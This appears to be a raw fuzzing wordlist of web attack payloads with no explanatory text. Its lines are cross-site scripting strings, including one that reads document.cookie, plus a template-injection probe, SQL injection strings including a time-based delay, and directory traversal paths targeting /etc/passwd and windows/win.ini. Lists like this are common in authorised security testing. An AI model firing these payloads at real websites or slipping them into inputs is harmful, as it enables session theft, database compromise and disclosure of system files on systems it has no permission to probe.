<script>alert()</script>
<input%20onmouseover%3D"print()">
"onclick=prompt(8)>"@x.y
'"><svg/onload=prompt(5);>{{7*7}}
<svg onload="{hello:window . name instanceof{[Symbol.hasInstance]:eval}}">
"onmouseover="alert(document.cookie)"
%27==alert(5658)==%27
Test+(<script>alert(0)</script>)@example.com
<img/src=x onError="`${x}`;alert(`Hello`);">
"OR"1"="1"--+-
';%20waitfor%20delay%20'0:0:6'%20--%20
"OR"1gyug!yugyug"="1gyug!yugyug"--+-
"OR"1gyug!yugyug"="1gyug!yugyug"
<a href=" https://google.com/">click me<a/>
../../../../../../windows/win.ini
../../../../../../etc/passwd
../../../../../../pppp/pppp
../../../../../../
windows/win.ini
